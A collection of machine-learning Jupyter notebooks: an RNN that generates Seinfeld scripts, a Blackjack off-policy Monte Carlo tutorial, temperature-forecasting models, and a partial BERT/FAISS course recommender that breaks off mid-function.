# Training parameters
# Number of Epochs
num_epochs = 9
# Learning Rate
learning_rate = 0.001
# Model parameters
# Vocab size
vocab_size = len(vocab_to_int)
# Output size
output_size = vocab_size
# Embedding Dimension
embedding_dim = 256
# Hidden Dimension
hidden_dim = 512
# Number of RNN Layers
n_layers = 3
# Show stats for every n number of batches
show_every_n_batches = 500
```
### Train
In the next cell, you'll train the neural network on the pre-processed data. If you have a hard time getting a good loss, you may consider changing your hyperparameters. In general, you may get better results with larger hidden and n_layer dimensions, but larger models take a longer time to train.
> **You should aim for a loss less than 3.5.**
You should also experiment with different sequence lengths, which determine the size of the long range dependencies that a model can learn.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# create model and move to gpu if available
rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)
if train_on_gpu:
rnn.cuda()
# defining loss and optimization functions for training
optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)
criterion = nn.CrossEntropyLoss()
# training the model
trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)
# saving the trained model
helper.save_model('./save/trained_rnn', trained_rnn)
print('Model Trained and Saved')
```
### Question: How did you decide on your model hyperparameters?
For example, did you try different sequence_lengths and find that one size made the model converge faster? What about your hidden_dim and n_layers; how did you decide on those?
**Answer:** Most of the params were selected based on community input gathered from online sources. Sequence length was a little special in that I could not find many suggestions online, I tested, 4, 6, 8, 16, 32, 64, 128, and 1024 length sequences. I found that smaller sequences where effective, but I am not conclusive. 8 achieved the best results in a fairly short time.
I also tested other params like hidden dims and layers, etc. The conclusion was that higher embedding dims did not improve performance, while higher hidden dims did, 2-3 layers seems to offer little difference in performance.
---
# Checkpoint
After running the above training cell, your model will be saved by name, `trained_rnn`, and if you save your notebook progress, **you can pause here and come back to this code at another time**. You can resume your progress by running the next cell, which will load in our word:id dictionaries _and_ load in your saved model by name!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import torch
import helper
import problem_unittests as tests
_, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
trained_rnn = helper.load_model('./save/trained_rnn')
```
## Generate TV Script
With the network trained and saved, you'll use it to generate a new, "fake" Seinfeld TV script in this section.
### Generate Text
To generate the text, the network needs to start with a single word and repeat its predictions until it reaches a set length. You'll be using the `generate` function to do this. It takes a word id to start with, `prime_id`, and generates a set length of text, `predict_len`. Also note that it uses topk sampling to introduce some randomness in choosing the most likely next word, given an output set of word scores!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
import torch.nn.functional as F
def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100):
"""
Generate text using the neural network
:param decoder: The PyTorch Module that holds the trained neural network
:param prime_id: The word id to start the first prediction
:param int_to_vocab: Dict of word id keys to word values
:param token_dict: Dict of puncuation tokens keys to puncuation values
:param pad_value: The value used to pad a sequence
:param predict_len: The length of text to generate
:return: The generated text
"""
rnn.eval()
# create a sequence (batch_size=1) with the prime_id
current_seq = np.full((1, sequence_length), pad_value)
current_seq[-1][-1] = prime_id
predicted = [int_to_vocab[prime_id]]
for _ in range(predict_len):
if train_on_gpu:
current_seq = torch.LongTensor(current_seq).cuda()
else:
current_seq = torch.LongTensor(current_seq)
# initialize the hidden state
hidden = rnn.init_hidden(current_seq.size(0))
# get the output of the rnn
output, _ = rnn(current_seq, hidden)
# get the next word probabilities
p = F.softmax(output, dim=1).data
if(train_on_gpu):
p = p.cpu() # move to cpu
# use top_k sampling to get the index of the next word
top_k = 5
p, top_i = p.topk(top_k)
top_i = top_i.numpy().squeeze()
# select the likely next word index with some element of randomness
p = p.numpy().squeeze()
word_i = np.random.choice(top_i, p=p/p.sum())
# retrieve that word from the dictionary
word = int_to_vocab[word_i]
predicted.append(word)
# the generated word becomes the next "current sequence" and the cycle can continue
current_seq = np.roll(current_seq, -1, 1)
current_seq[-1][-1] = word_i
gen_sentences = ' '.join(predicted)
# Replace punctuation tokens
for key, token in token_dict.items():
ending = ' ' if key in ['\n', '(', '"'] else ''
gen_sentences = gen_sentences.replace(' ' + token.lower(), key)
gen_sentences = gen_sentences.replace('\n ', '\n')
gen_sentences = gen_sentences.replace('( ', '(')
# return all the sentences
return gen_sentences
```
### Generate a New Script
It's time to generate the text. Set `gen_length` to the length of TV script you want to generate and set `prime_word` to one of the following to start the prediction:
- "jerry"
- "elaine"
- "george"
- "kramer"
You can set the prime word to _any word_ in our dictionary, but it's best to start with a name for generating a TV script. (You can also start with any other names you find in the original text file!)
```
import numpy as np
# run the cell multiple times to get different results!
gen_length = 400 # modify the length to your preference
prime_word = 'jerry' # name for starting the script
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
pad_word = helper.SPECIAL_WORDS['PADDING']
generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict, vocab_to_int[pad_word], gen_length)
print(generated_script)
```
#### Save your favorite scripts
Once you have a script that you like (or find interesting), save it to a text file!
```
# save script to a text file
f = open("generated_script_1.txt","w")
f.write(generated_script)
f.close()
```
# The TV Script is Not Perfect
It's ok if the TV script doesn't make perfect sense. It should look like alternating lines of dialogue, here is one such example of a few generated lines.
### Example generated script
>jerry: what about me?
>
>jerry: i don't have to wait.
>
>kramer:(to the sales table)
>
>elaine:(to jerry) hey, look at this, i'm a good doctor.
>
>newman:(to elaine) you think i have no idea of this...
>
>elaine: oh, you better take the phone, and he was a little nervous.
>
>kramer:(to the phone) hey, hey, jerry, i don't want to be a little bit.(to kramer and jerry) you can't.
>
>jerry: oh, yeah. i don't even know, i know.
>
>jerry:(to the phone) oh, i know.
>
>kramer:(laughing) you know...(to jerry) you don't know.
You can see that there are multiple characters that say (somewhat) complete sentences, but it doesn't have to be perfect! It takes quite a while to get good results, and often, you'll have to use a smaller vocabulary (and discard uncommon words), or get more data. The Seinfeld dataset is about 3.4 MB, which is big enough for our purposes; for script generation you'll want more than 1 MB of text, generally.
# Submitting This Project
When submitting this project, make sure to run all the cells before saving the notebook. Save the notebook file as "dlnd_tv_script_generation.ipynb" and save another copy as an HTML file by clicking "File" -> "Download as.."->"html". Include the "helper.py" and "problem_unittests.py" files in your submission. Once you download these files, compress them into one zip file for submission.
|
github_jupyter
|
# "Monte Carlo 6: Off-Policy Control with Importance Sampling in Reinforcement Learning"
> Find the optimal policy using Weighted Importance Sampling
- toc: true
- branch: master
- badges: false
- comments: true
- hide: false
- search_exclude: true
- metadata_key1: metadata_value1
- metadata_key2: metadata_value2
- image: images/MCControl_OffPolicy_BlackJack.png
- categories: [Reinforcement_Learning,MC, OpenAI,Gym,]
- show_tags: true
```
# hide
# inspired by
# https://github.com/dennybritz/reinforcement-learning/blob/master/MC/Off-Policy%20MC%20Control%20with%20Weighted%20Importance%20Sampling%20Solution.ipynb
#hide
from google.colab import drive
drive.mount('/content/gdrive', force_remount=True)
root_dir = "/content/gdrive/My Drive/"
# base_dir = root_dir + 'Sutton&Barto/ch05/dennybritz_reinforcement-learning_MC/'
base_dir = root_dir + 'Sutton&Barto/'
# hide
%cd "{base_dir}"
# hide
!pwd
```
## 1. Introduction
In a *Markov Decision Process* (Figure 1) the *agent* and *environment* interacts continuously.

More details are available in [Reinforcement Learning: An Introduction by Sutton and Barto](http://incompleteideas.net/book/RLbook2020.pdf).
The dynamics of the MDP is given by
$$
\begin{aligned}
p(s',r|s,a) &= Pr\{ S_{t+1}=s',R_{t+1}=r | S_t=s,A_t=a \} \\
\end{aligned}
$$
The *policy* of an agent is a mapping from the current state of the environment to an *action* that the agent needs to take in this state. Formally, a policy is given by
$$
\begin{aligned}
\pi(a|s) &= Pr\{A_t=a|S_t=s\}
\end{aligned}
$$
The discounted *return* is given by
$$
\begin{aligned}
G_t &= R_{t+1} + \gamma R_{t+2} + \gamma ^2 R_{t+3} + ... + R_T \\
&= \sum_{k=0}^\infty \gamma ^k R_{t+1+k}
\end{aligned}
$$
where $\gamma$ is the discount factor and $R$ is the *reward*.
Most reinforcement learning algorithms involve the estimation of value functions - in our present case, the *state-value function*. The state-value function maps each state to a measure of "how good it is to be in that state" in terms of expected rewards. Formally, the state-value function, under policy $\pi$ is given by
$$
\begin{aligned}
v_\pi(s) &= \mathbb{E}_\pi[G_t|S_t=s]
\end{aligned}
$$
The Monte Carlo algorithm discussed in this post will numerically estimate $v_\pi(s)$.
## 2. Environment
The environment is the game of *Blackjack*. The player tries to get cards whose sum is as great as possible without exceeding 21. Face cards count as 10. An ace can be taken either as a 1 or an 11. Two cards are dealth to both dealer and player. One of the dealer's cards is face up (other is face down). The player can request additional cards, one by one (called *hits*) until the player stops (called *sticks*) or goes above 21 (goes *bust* and loses). When the players sticks it becomes the dealer's turn which uses a fixed strategy: sticks when the sum is 17 or greater and hits otherwise. If the dealer goes bust the player wins, otherwise the winner is determined by whose sum is closer to 21.
We formulate this game as an episodic finite MDP. Each game is an episode.
* States are based on the player's
* current sum (12-21)
* player will automatically keep on getting cards until the sum is at least 12 (this is a rule and the player does not have a choice in this matter)
* dealer's face up card (ace-10)
* whether player holds usable ace (True or False)
This gives a total of 200 states: $10 × 10 \times 2 = 200$
* Rewards:
* +1 for winning
* -1 for losing
* 0 for drawing
* Reward for stick:
* +1 if sum > sum of dealer
* 0 if sum = sum of dealer
* -1 if sum < sum of dealer
* Reward for hit:
* -1 if sum > 21
* 0 otherwise
The environment is implemented using the OpenAI Gym library.
## 3. Agent
The *agent* is the player. After observing the state of the *environment*, the agent can take one of two possible actions:
* stick (0) [stop receiving cards]
* hit (1) [have another card]
The agent's policy will be deterministic - will always stick of the sum is 20 or 21, and hit otherwise. We call this *policy1* in the code.
## 4. Monte Carlo Estimation of the Action-value Function, $q_\pi(s,a)$
We will now proceed to estimate the action-value function for the given policy $\pi$. We can take $\gamma=1$ as the sum will remain finite:
$$ \large
\begin{aligned}
q_\pi(s,a) &= \mathbb{E}_\pi[G_t | S_t=s, A_t=a] \\
&= \mathbb{E}_\pi[R_{t+1} + \gamma R_{t+2} + \gamma ^2 R_{t+3} + ... + R_T | S_t=s, A_t=a] \\
&= \mathbb{E}_\pi[R_{t+1} + R_{t+2} + R_{t+3} + ... + R_T | S_t=s, A_t=a]
\end{aligned}
$$
In numeric terms this means that, given a state and an action, we take the sum of all rewards from that state onwards (following policy $\pi$) until the game ends, and take the average of all such sequences.
### 4.1 Off-policy Estimation via Importance Sampling
On-policy methods, used so far in this series, represents a compromise. They learn action values not for the optimal policy but for a near-optimal policy that can still explore. The off-policy methods, on the other hand, make use of *two* policies - one that is being optimized (called the *target* policy) and another one (the *behavior* policy) that is used for exploratory purposes.
An important concept used by off-policy methods is *importance sampling*. This is a general technique for extimating expected values under one distribution by using samples from another. This allows us to weight returns according to the relative probability of a trajectory occurring under the target and behavior policies. This relative probability is called the importance-sampling ratio
$$ \large
\rho_{t:T-1}=\frac{\prod_{k=t}^{T-1} \pi(A_k|S_k) p(S_{k+1}|S_k,A_k)}{\prod_{k=t}^{T-1} b(A_k|S_k) p(S_{k+1}|S_k,A_k)}=∏_{k=t}^{T-1} \frac{\pi(A_k|S_k)}{b(A_k|S_k)}
$$
where $\pi$ is the *target* policy, and $b$ is the *behavior* policy.
In oder to estimate $q_{\pi}(s,a)$ we need to estimate expected returns under the target policy. However, we only have access to returns due to the behavior
policy. To perform this "off-policy" procedure we can make use of the following:
$$ \large
\begin{aligned}
q_\pi(s,a) &= \mathbb E_\pi[G_t|S_t=s, A_t=a] \\
&= \mathbb E_b[\rho_{t:T-1}G_t|S_t=s, A_t=a]
\end{aligned}
$$
This allows us to simply scale or weight the returns under $b$ to yield returns under $\pi$.
In our current *prediction* problem, both the target and behavior policies are fixed.
## 5. Implementation
Figure 2 shows the algorithm for off-policy control for the estimation of the optimal policy function:

Next, we present the code that implements the algorithm.
```
import gym
import matplotlib
import numpy as np
import sys
from collections import defaultdict
import pprint as pp
from matplotlib import pyplot as plt
%matplotlib inline
# hide
# from lib import plotting as myplot
# from lib.envs.blackjack import BlackjackEnv
from dennybritz_lib import plotting as myplot
from dennybritz_lib.envs.blackjack import BlackjackEnv
# hide
# env = gym.make('Blackjack-v0')#.has differences cp to the one used here
#- env = gym.make('Blackjack-v1')#.does not exist
env = BlackjackEnv()
```
### 5.1 Policy
The following function captures the target policy used:
```
def create_random_policy(n_A):
A = np.ones(n_A, dtype=float)/n_A
def policy_function(observation):
return A
return policy_function #vector of action probabilities
# hide
# def create_greedy_policy(Q):
# def policy_function(state):
# A = np.zeros_like(Q[state], dtype=float)
# best_action = np.argmax(Q[state])
# A[best_action] = 1.0
# return A
# return policy_function
# hide
# def create_policy():
# policy = defaultdict(int)
# for sum in [12, 13, 14, 15, 16, 17, 18, 19, 20, 21]:
# for showing in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:
# for usable in [False, True]:
# policy[(sum, showing, usable)] = np.random.choice([0, 1]) #random
# # policy[(sum, showing, usable)] = 0 #all zeros
# return policy
def create_policy():
policy = defaultdict(int)
return policy
```
### 5.2 Generate episodes
The following function sets the environment to a random initial state. It then enters a loop where each iteration applies the policy to the environment's state to obtain the next action to be taken by the agent. That action is then applied to the environment to get the next state, and so on until the episode ends.
```
def generate_episode(env, policy):
episode = []
state = env.reset() #to a random state
while True:
probs = policy(state)
action = np.random.choice(np.arange(len(probs)), p=probs)
next_state, reward, done, _ = env.step(action) # St+1, Rt+1 OR s',r
episode.append((state, action, reward)) # St, At, Rt+1 OR s,a,r
if done:
break
state = next_state
return episode
```
### 5.3 Main loop
The following function implements the main loop of the algorithm. It iterates for ``n_episodes``. It also takes a list of ``monitored_state_actions`` for which it will record the evolution of action values. This is handy for showing how action values converge during the process.
```
def mc_control(env, n_episodes, discount_factor=1.0, monitored_state_actions=None, diag=False):
#/// G_sum = defaultdict(float)
#/// G_count = defaultdict(float)
Q = defaultdict(lambda: np.zeros(env.action_space.n))
C = defaultdict(lambda: np.zeros(env.action_space.n))
pi = create_policy()
monitored_state_action_values = defaultdict(list)
for i in range(1, n_episodes + 1):
if i%1000 == 0: print("\rEpisode {}/{}".format(i, n_episodes), end=""); sys.stdout.flush()
b = create_random_policy(env.action_space.n)
episode = generate_episode(env, b); print(f'\nepisode {i}: {episode}') if diag else None
G = 0.0
W = 1.0
for t in range(len(episode))[::-1]:
St, At, Rtp1 = episode[t]
print(f"---t={t} St, At, Rt+1: {St, At, Rtp1}") if diag else None
G = discount_factor*G + Rtp1; print(f"G: {G}") if diag else None
C[St][At] += W; print(f"C[St][At]: {C[St][At]}") if diag else None #Weighted Importance Sampling (WIS) denominator
Q[St][At] += (W/C[St][At])*(G - Q[St][At]); print(f"Q[St][At]: {Q[St][At]}") if diag else None
pi[St] = np.argmax(Q[St]) #greedify pi, max_a Q[state][0], Q[state][1]
if At != np.argmax(pi[St]):
break
W = W*1.0/b(St)[At]; print(f"W: {W}, b(St)[At]: {b(St)[At]}") if diag else None
if monitored_state_actions:
for msa in monitored_state_actions:
s = msa[0]; a = msa[1]
# print("\rQ[{}]: {}".format(msa, Q[s][a]), end=""); sys.stdout.flush()
monitored_state_action_values[msa].append(Q[s][a])
print('\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++') if diag else None
#/// pp.pprint(f'G_sum: {G_sum}') if diag else None
#/// pp.pprint(f'G_count: {G_count}') if diag else None
print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++') if diag else None
print('\nmonitored_state_action_values:', monitored_state_action_values) if diag else None
return Q,pi,monitored_state_action_values
```
### 5.4 Monitored state-actions
Let's pick a number of state-actions to monitor. Each tuple captures the player's sum, the dealer's showing card, and whether the player has a usable ace, as well as the action taken in the state:
```
monitored_state_actions=[((21, 7, False), 0), ((20, 7, True), 0), ((12, 7, False), 1), ((17, 7, True), 0)]
Q,pi,monitored_state_action_values = mc_control(
env,
n_episodes=10,
monitored_state_actions=monitored_state_actions,
diag=True)
Q
Q[(13, 5, False)]
pi
pi[(18, 4, False)]
V = defaultdict(float)
for state, actions in Q.items():
action_value = np.max(actions)
V[state] = action_value
V
print(monitored_state_actions[0])
print(monitored_state_action_values[monitored_state_actions[0]])
#
# last value in monitored_state_actions should be value in Q
msa = monitored_state_actions[0]; print('msa:', msa)
s = msa[0]; print('s:', s)
a = msa[1]; print('a:', a)
monitored_state_action_values[msa][-1], Q[s][a] #monitored_stuff[msa] BUT Q[s][a]
```
### 5.5 Run 1
First, we will run the algorithm for 10,000 episodes, using policy1:
```
Q1,pi1,monitored_state_action_values1 = mc_control(
env,
n_episodes=10_000,
monitored_state_actions=monitored_state_actions,
diag=False)
#
# last value in monitored_state_actions should be value in Q
msa = monitored_state_actions[0]; print('msa:', msa)
s = msa[0]; print('s:', s)
a = msa[1]; print('a:', a)
monitored_state_action_values1[msa][-1], Q1[s][a] #monitored_stuff[msa] BUT Q[s][a]
```
The following chart shows how the values of the 4 monitored state-actions converge to their values:
```
plt.rcParams["figure.figsize"] = (18,10)
for msa in monitored_state_actions:
plt.plot(monitored_state_action_values1[msa])
plt.title('Estimated $q_\pi(s,a)$ for some state-actions', fontsize=18)
plt.xlabel('Episodes', fontsize=16)
plt.ylabel('Estimated $q_\pi(s,a)$', fontsize=16)
plt.legend(monitored_state_actions, fontsize=16)
plt.show()
```
The following charts shows the estimate of the associated estimated optimal state-value function, $v_*(s)$, for the cases of a usable ace as well as not a usable ace. First, we compute ```V1``` which is the estimate for $v_*(s)$:
```
V1 = defaultdict(float)
for state, actions in Q1.items():
action_value = np.max(actions)
V1[state] = action_value
AZIM = -110
ELEV = 20
myplot.plot_pi_star_and_v_star(pi1, V1, title="$\pi_* and v_*$", wireframe=False, azim=AZIM-40, elev=ELEV);
```
### 5.6 Run 2
Our final run uses 500,000 episodes and the accuracy of the action-value function is higher.
```
Q2,pi2,monitored_state_action_values2 = mc_control(
env,
n_episodes=500_000,
monitored_state_actions=monitored_state_actions,
diag=False)
#
# last value in monitored_state_actions should be value in Q
msa = monitored_state_actions[0]; print('msa:', msa)
s = msa[0]; print('s:', s)
a = msa[1]; print('a:', a)
monitored_state_action_values2[msa][-1], Q2[s][a] #monitored_stuff[msa] BUT Q[s][a]
plt.rcParams["figure.figsize"] = (18,12)
for msa in monitored_state_actions:
plt.plot(monitored_state_action_values2[msa])
plt.title('Estimated $q_\pi(s,a)$ for some state-actions', fontsize=18)
plt.xlabel('Episodes', fontsize=16)
plt.ylabel('Estimated $q_\pi(s,a)$', fontsize=16)
plt.legend(monitored_state_actions, fontsize=16)
plt.show()
V2 = defaultdict(float)
for state, actions in Q2.items():
action_value = np.max(actions)
V2[state] = action_value
# myplot.plot_action_value_function(Q2, title="500,000 Steps", wireframe=True, azim=AZIM, elev=ELEV)
myplot.plot_pi_star_and_v_star(pi2, V2, title="$\pi_* and v_*$", wireframe=False, azim=AZIM-40, elev=ELEV);
```
|
github_jupyter
|
```
import pandas as pd
from sklearn.model_selection import train_test_split
'''
NOTE: This was done in Google Colab
The data (Minimum Daily Temperatures Dataset) is from
Jason Brownlee's "7 Time Series Datasets for Machine Learning" article:
https://machinelearningmastery.com/time-series-datasets-for-machine-learning/
His datasets are found at:
https://github.com/jbrownlee/Datasets
This specific data is found at:
https://github.com/jbrownlee/Datasets/blob/master/daily-min-temperatures.csv
It is also found at:
https://www.kaggle.com/paulbrabban/daily-minimum-temperatures-in-melbourne/
'''
#Obtain Data:
df = pd.read_csv('/content/daily-min-temperatures.csv')
train, test = train_test_split(df,test_size=0.25)
train_x, train_y = train[['Date']], train[['Temp']]
test_x,train_y = test[['Date']], test[['Temp']]
'''
Naive approach
-Convert Date into Year,Month,Days. These should become one-hot variables.
-Suppose the idea of years is not in this model.
-The idea is that the model notices that winter months should be colder than summer months.
'''
import tensorflow as tf
import tensorflow.keras
from datetime import datetime
from tensorflow.keras import layers, Sequential
from sklearn.preprocessing import MinMaxScaler
def build_model():
model = Sequential([
layers.Flatten(input_shape=(43,)),
layers.Dropout(0.5),
layers.Dense(43,activation='relu'),
layers.Dropout(0.5),
layers.Dense(1),
])
model.compile(optimizer='adam',loss='mse',metrics=['mae','mse'])
return model
def convertDates(df):
dateConverted = df[['Date']].apply([
lambda d : datetime.strptime(d.Date, '%Y-%m-%d'),
lambda d : d.Date[:4],
lambda d : d.Date[5:7],
lambda d : d.Date[8:]
],axis=1).set_axis(['Datetime','Year','Month','Day'],axis=1)
#One Hot conversion for dates
for c in ['Month','Day']:
oneHot = pd.get_dummies(dateConverted[c],prefix=c)
dateConverted = dateConverted.drop(c,axis=1)
dateConverted = dateConverted.join(oneHot)
return dateConverted
def normalizeTemp(df):
mms = MinMaxScaler()
normalized_train_y = mms.fit_transform(df[['Temp']])
return normalized_train_y
def massageData(df):
#Expand Dates
dateConverted = convertDates(df)
#Remove certain columns
dateConverted.pop('Datetime')
dateConverted.pop('Year')
#Normalize tempatures
return dateConverted, normalizeTemp(df)
df = pd.read_csv('/content/daily-min-temperatures.csv')
new_dates, new_temp = massageData(df)
train_x, test_x, train_y, test_y = train_test_split(new_dates, new_temp,test_size=0.25)
model = build_model()
model.fit(train_x,train_y,epochs=80,validation_split=0.2)
model.evaluate(test_x,test_y,verbose=1)
'''
The naive approach seems to think more in terms of averages rather than actual predictions.
Also, the predictions, once outside the range of years, may become wildly inaccurate.
'''
df = pd.read_csv('/content/daily-min-temperatures.csv')
convertedDates = convertDates(df)
predicted1 = pd.DataFrame(model.predict(convertedDates[convertedDates.columns[2:]]),columns=['PredictedTemp1'])
temps = predicted1.join(pd.DataFrame(normalizeTemp(df[['Temp']]),columns=['TrueValue']))
datetimeToTemp = convertedDates[['Datetime']].join(temps)
datetimeToTemp.plot('Datetime',figsize=(30,10))
datetimeToTemp
'''
Less Naive approach? (AKA, "featurize the past?")
-Convert Date into Year,Month,Days. These should become one-hot variables.
-Suppose the idea of years is not in this model.
-Add a feature column that contains the previous 30 days of temperatures.
-The idea is that previous days can affect the next.
'''
import numpy as np
import tensorflow as tf
import tensorflow.keras
from datetime import datetime
from tensorflow.keras import layers, Sequential
from sklearn.preprocessing import MinMaxScaler
def build_model():
model = Sequential([
layers.Flatten(input_shape=(73,)),
layers.Dropout(0.5),
layers.Dense(73,activation='relu'),
layers.Dropout(0.5),
layers.Dense(1),
])
model.compile(optimizer='adam',loss='mse',metrics=['mae','mse'])
return model
def convertDates(df):
dateConverted = df[['Date']].apply([
lambda d : datetime.strptime(d.Date, '%Y-%m-%d'),
lambda d : d.Date[:4],
lambda d : d.Date[5:7],
lambda d : d.Date[8:]
],axis=1).set_axis(['Datetime','Year','Month','Day'],axis=1)
#One Hot conversion for dates
for c in ['Month','Day']:
oneHot = pd.get_dummies(dateConverted[c],prefix=c)
dateConverted = dateConverted.drop(c,axis=1)
dateConverted = dateConverted.join(oneHot)
return dateConverted
def normalizeTemp(df):
mms = MinMaxScaler()
normalized_train_y = mms.fit_transform(df[['Temp']])
return normalized_train_y
def massageData(df):
#Expand Dates
dateConverted = convertDates(df)
#Remove certain columns
dateConverted.pop('Datetime')
dateConverted.pop('Year')
#Normalize tempatures
return dateConverted, normalizeTemp(df)
df = pd.read_csv('/content/daily-min-temperatures.csv')
new_dates, new_temp = massageData(df)
new_temp_df = pd.DataFrame(new_temp,columns=['Temp'])
#Add the past into it.
for i in range(1,31):
new_dates['temp_days_minus_'+str(i)] = new_temp_df[['Temp']].shift(i)
new_dates = new_dates[30:]
new_temp = new_temp[30:]
train_x, test_x, train_y, test_y = train_test_split(new_dates, new_temp,test_size=0.25)
model = build_model()
model.fit(train_x,train_y,epochs=80,validation_split=0.2,verbose=0)
model.evaluate(test_x,test_y,verbose=1)
'''
This still seems to have the same issues with the last one.
The only apparent difference is that the second model seems to
follow the extremes more closely.
'''
df = pd.read_csv('/content/daily-min-temperatures.csv')
convertedDates = convertDates(df)[30:]
predicted1edited = predicted1[30:]
predicted1edited.index = convertedDates.index = range(0,len(convertedDates))
predicted2 = pd.DataFrame(model.predict(new_dates),columns=['PredictedTemp2'])
temps = predicted1edited.join(predicted2).join(pd.DataFrame(new_temp,columns=['TrueTemp']))
datetimeToTemp = convertedDates[['Datetime']].join(temps)
datetimeToTemp.plot('Datetime',figsize=(30,10))
datetimeToTemp
'''
Long-Short Term Memory approach.
-Use LSTM and concepts from RNN networks.
'''
import numpy as np
import pandas as pd
import tensorflow as tf
import tensorflow.keras
from sklearn.model_selection import train_test_split
from datetime import datetime
from tensorflow.keras import layers, Sequential
from sklearn.preprocessing import MinMaxScaler
def convertDates(df):
dateConverted = df[['Date']].apply([
lambda d : datetime.strptime(d.Date, '%Y-%m-%d')
],axis=1).set_axis(['Datetime'],axis=1)
return dateConverted
def normalizeTemp(df):
mms = MinMaxScaler()
normalized_train_y = mms.fit_transform(df[['Temp']])
return normalized_train_y
def massageData(df):
#Expand Dates
dateConverted = convertDates(df)
#Remove certain columns
dateConverted.pop('Datetime')
dateConverted.pop('Year')
#Normalize tempatures
return dateConverted, normalizeTemp(df)
df = pd.read_csv('/content/daily-min-temperatures.csv')
norm_temp = normalizeTemp(df)
def build_model():
model = Sequential([
layers.LSTM(30,input_shape=(30,1)),
layers.Dense(1),
])
model.compile(optimizer='adam',loss='mae',metrics=['mae','mse'])
return model
xs = np.array([
np.reshape(norm_temp[i-31:i-1],(30,1))
for i in range(31,len(norm_temp))])
ys = np.array([
norm_temp[i]
for i in range(31,len(norm_temp))])
c = ["temp_"+str(x) for x in range(1,31)]+["true_value"]
train_x, test_x, train_y, test_y = train_test_split(xs,ys,test_size=0.25)
model = build_model()
print(train_y.shape)
print(test_y.shape)
model.fit(train_x,train_y,validation_split=0.2,epochs=80)
model.evaluate(test_x,test_y,verbose=1)
'''
It appears RNNs really do work here.
'''
predicted3 = pd.DataFrame(model.predict(xs),columns=['PredictedTemp3'])
true = pd.DataFrame(ys,columns=['True'])
plot_me = datetimeToTemp.join(predicted3)
plot_me = plot_me[['PredictedTemp1','PredictedTemp2','PredictedTemp3','TrueTemp']]
plot_me.plot(figsize=(30,20))
err = plot_me.apply([
lambda a : abs(a.PredictedTemp1 - a.TrueTemp),
lambda a : abs(a.PredictedTemp2 - a.TrueTemp),
lambda a : abs(a.PredictedTemp3 - a.TrueTemp)
],axis=1).set_axis(['Err1','Err2','Err3'],axis=1)
#cumulative error comparison.
err.rolling(99999,min_periods=1).sum().plot(figsize=(30,10))
```
|
github_jupyter
|
## This notebook:
- Try deep learning method on content based filtering
----------------------
### 1. Read files into dataframe
### 2. concat_prepare(f_df, w_df)
- Concat f_21, w_21
### 3. store_model(df) - only once for a new dataframe
- Train a SentenceTransformer model
- Save embedder, embeddings, and corpus
### 4. Read the stored embedder, embeddings, and corpus
### 5. dl_content(df, embeddings, corpus, embedder, course_title, k = 10, filter_level = 'subject', semester = 'fall', lsa = None)
- input
- df: dataset
- embeddings, corpus, embedder: stored embeddings, stored corpus, stored embedder
- course_title: input course title
- k: number of recommendation
- filter_lever, semester, lsa
- output
- recommended courses in df
```
import pandas as pd
import numpy as np
import pickle
import sklearn
import faiss
import spacy
from sentence_transformers import SentenceTransformer
import scipy.spatial
online = pd.read_csv('assets/original/2021-10-19-MichiganOnline-courses.csv')
f_21 = pd.read_csv('assets/f_21_merge.csv')
w_22 = pd.read_csv('assets/w_22_merge.csv')
def concat_prepare(f_df, w_df):
f_df['semester'] = 'fall'
w_df['semester'] = 'winter'
# Concat
df = pd.concat([f_df, w_df])
# Clean
df = df.fillna('').drop_duplicates(subset=['course']).reset_index().drop(columns='index')
# Remove description with no information
df['description'].replace('(Hybrid, Synchronous)', '', inplace = True)
# Merge all the text data
df['text'] = df['Subject'] + ' ' \
+ df['Course Title'] + ' ' \
+ df['sub_title'] +' '\
+ df['description']
return df
fw = concat_prepare(f_21, w_22)
def store_model(df):
corpus = df['text'].tolist()
embedder = SentenceTransformer('bert-base-nli-mean-tokens')
corpus_embeddings = embedder.encode(corpus)
with open('corpus_embeddings.pkl', "wb") as fOut:
pickle.dump({'corpus': corpus, 'embeddings': corpus_embeddings}, fOut, protocol=pickle.HIGHEST_PROTOCOL)
with open('embedder.pkl', "wb") as fOut:
pickle.dump(embedder, fOut, protocol=pickle.HIGHEST_PROTOCOL)
#store_model(fw)
```
## Bert Sentence Transformer
```
%%time
#Load sentences & embeddings from disc
with open('corpus_embeddings.pkl', "rb") as fIn:
stored_data = pickle.load(fIn)
stored_corpus = stored_data['corpus']
stored_embeddings = stored_data['embeddings']
with open('embedder.pkl', "rb") as fIn:
stored_embedder = pickle.load(fIn)
len(stored_corpus), len(fw['text'].to_list())
```
## Deep learning content based filtering
```
def dl_content(df, embeddings, corpus, embedder, course_title, k = 10, filter_level = 'subject', semester = 'fall', lsa = None):
# df: dataset
# embeddings: stored_embeddings
# corpus: stored_corpus or df['text'].tolist() -- should be the same
# embedder: stored_embedder
# course_title = input course title
# k = number of recommendation
# filter_level = 'subject', semester = 'fall', lsa = None
# If the len of corpus doesn't match the len of input df text, can't process the rec sys properly.
if len(corpus) != len(df['text']):
print('Stored corpus and the text of the input dataset are different.')
return None
else:
input_ag = df.loc[df['course'] == course_title, 'Acad Group'].unique()
input_sub = df.loc[df['course'] == course_title, 'Subject'].unique()
input_course = df.loc[df['course'] == course_title, 'Course Title'].unique()
input_subtitle = df.loc[df['course'] == course_title, 'sub_title'].unique()
input_des = df.loc[df['course'] == course_title, 'description'].unique()
query = [' '.join(input_sub + input_course + input_subtitle + input_des)]
if len(query[0]) == 0:
print('No text information was provided for the recommender system')
return None
d = 768
index = faiss.IndexFlatL2(d)
index.add(np.stack(embeddings, axis=0))
query_embedding = embedder.encode(query)
D, I = index.search(query_embedding, k) # actual search
distances, indices = index.search(np.asarray(query_embedding).reshape(1,768),k)
#print("Query:", query)
